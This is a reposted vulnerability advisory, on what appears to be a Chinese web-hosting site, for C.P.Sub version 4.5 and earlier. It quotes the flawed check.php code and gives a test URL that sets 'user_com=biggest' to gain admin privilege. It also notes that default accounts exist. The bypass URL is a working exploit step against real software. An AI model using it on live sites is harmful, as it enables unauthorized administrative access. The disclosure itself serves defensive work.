鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

C.P.Sub 4.5 认证绕过

来源:互联网 作者:佚名 时间:2015-10-19 08:33
#!/usr/bin/python## 标题: C.P.Sub = v4.5 Misconfiguration and Improper Authentication# Date: 2013/6/27# 作者: Chako# 开发者: http://www.cooltey.org/ping/php.php# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip# Versio
#!/usr/bin/python
#
# 标题: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# 作者: Chako
# 开发者: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# 测试系统: Windows 7 
#
####################################################################
 
Improper Authentication:
==========================================
 
概述:
    C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.
    Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege.
 
 
/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
  $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
  $user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------
 
 
测试:
--------------------------------------------------------------
 
change
http://www.2cto.com /info.php?cookie=yes&user_com=second
 
to
http://Example_Target/info.php?cookie=yes&user_com=biggest
 
 
 
Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allows an attacker
to access back-end management page. It could lead to further attack.

 

网友评论
<